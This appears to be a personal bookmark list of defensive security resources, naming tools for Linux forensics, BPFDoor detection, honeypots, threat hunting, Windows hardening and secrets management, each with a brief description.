Defense
I've been collecting some of these as well, just need to place those links/notes in their home.
- Laurel
- auditd logs in JSON format to make SIEM ingestion/analysis easier
- BPFDoor Scanner
- Check for presence of BPFDoor implant
- Linux-CatScale
- Collect info from Linux hosts
- See this article about the tool
- maloverview
- First response tool for malware, URLs, IPs, etc.
- seccomp-tools
- Analyze seccomp profiles
- bpfdoor-scanner
- Scan for compromised hosts
- bpf-hookdetect
- Detect syscall hooking w/ eBPF
- cowrie
- SSH + telnet honeypot
- threatest
- End-to-end TTP tests
- Also see: Introducing Threatest, a Go framework for end-to-end testing of threat detection rules
- linux-elf-binary-signer
- email-header-analyzer
- rip_raw
- Analyze memory of compromised Linux systems
- Melody
- Internet sensor built for CTI
- Digital Forensics Guide
- Ghidrathon
- Python 3 support for Ghidra
- HardeningKitty
- Checks + hardens Windows config
- windows_hardening
- Windows hardening settings + config
- mdec
- Cross-compare output of multiple decompilers
- dissect
- Python libraries meant for DFIR and aren't necessarily easy to use/find otherwise
- PowerHunt
- Threat-hunting PS1 module to (remotely) identify IOCs at scale based on artifacts associated w/ MITRE techniques
- Techniques In Email Forensic Analysis
- Protecting Against Privileged Credential Sprawl (AD)
- Flare VM
- Mandiant's security distro for malware analysis, IR, pentesting, etc.
- linux-elf-binary-signer
- Userland Rootkits are Lame
- Analyzing Linux userland rootkits tactics + defense measures
- Inspired by Symbiote rootkit analysis
- Live-patching security vulnerabilities inside the Linux kernel with eBPF Linux Security Module | Cloudflare
SDLC
- Mozilla SOPS
- Edit encrypted files to prevent credential leakage
- For Kubernetes: KSOPS
- Doppler
- Secrets manager
- BitWarden
- Open-source password manager
- TODO: Does this integrate with source control? Might be mistaken